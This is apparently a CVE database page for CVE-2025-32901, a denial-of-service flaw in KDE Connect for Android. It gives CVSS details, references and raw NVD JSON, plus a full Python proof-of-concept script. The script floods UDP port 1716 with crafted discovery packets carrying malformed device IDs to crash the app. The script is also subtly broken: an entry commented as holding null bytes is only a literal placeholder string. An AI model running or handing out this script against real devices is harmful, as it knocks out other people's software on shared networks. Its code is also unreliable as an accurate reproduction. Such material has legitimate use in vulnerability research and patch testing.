CVE-2025-32901

Description

In KDE Connect before 1.33.0 on Android, malicious device IDs (sent via broadcast UDP) could cause an application crash.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

KDE Connect for Android < 1.33.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-32901 PoC - KDE Connect Android DoS
This script sends malicious UDP broadcast packets with crafted device IDs
to trigger application crash in KDE Connect < 1.33.0
"""

import socket
import struct
import json
import time
import sys

def create_malicious_packet(device_id):
    """
    Create a malicious KDE Connect discovery packet with crafted device ID
    """
    # KDE Connect uses JSON over UDP for device discovery
    packet = {
        "id": device_id,
        "type": "device",
        "protocolVersion": 7,
        "deviceName": "MaliciousDevice",
        "deviceId": device_id,
        "tcpPort": 1716,
        "incomingCapabilities": ["kdeconnect.battery", "kdeconnect.notification"],
        "outgoingCapabilities": ["kdeconnect.battery", "kdeconnect.notification"]
    }
    return json.dumps(packet).encode('utf-8')

def send_udp_broadcast(target_ip, port, packet, count=1):
    """
    Send UDP broadcast packet to target
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(5)
    
    try:
        for i in range(count):
            sock.sendto(packet, (target_ip, port))
            print(f"[*] Sent malicious packet {i+1}/{count}")
            time.sleep(0.1)
    finally:
        sock.close()

def main():
    if len(sys.argv) < 2:
        target_ip = "<broadcast>"  # Default broadcast address
    else:
        target_ip = sys.argv[1]
    
    port = 1716  # KDE Connect default port
    
    # Test with various malicious device IDs
    malicious_ids = [
        "A" * 10000,  # Extremely long device ID
        "\x00\x01\x02" * 1000,  # Binary data
        "{null_chars}" + "B" * 5000,  # With null bytes
        "\n\r\t" * 2000,  # Special characters
    ]
    
    print("[*] CVE-2025-32901 PoC - KDE Connect Android DoS")
    print(f"[*] Target: {target_ip}:{port}")
    print("[*] Sending malicious packets...")
    
    for malicious_id in malicious_ids:
        print(f"[*] Testing with device ID length: {len(malicious_id)}")
        packet = create_malicious_packet(malicious_id)
        send_udp_broadcast(target_ip, port, packet, count=5)
        time.sleep(1)
    
    print("[+] Attack completed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-32901
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-32901
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-32901/
[4] VulDB https://vuldb.com/cve/CVE-2025-32901
[5] https://kde.org/info/security/advisory-20250418-4.txt
[6] https://kdeconnect.kde.org

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-32901", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:17:02.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In KDE Connect before 1.33.0 on Android, malicious device IDs (sent via broadcast UDP) could cause an application crash."}, {"lang": "es", "value": "En KDE Connect anterior a la versión 1.33.0 en Android, IDs de dispositivo maliciosos (enviados a través de UDP de difusión) podrían causar un fallo de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "references": [{"url": "https://kde.org/info/security/advisory-20250418-4.txt", "source": "[email protected]"}, {"url": "https://kdeconnect.kde.org", "source": "[email protected]"}]}}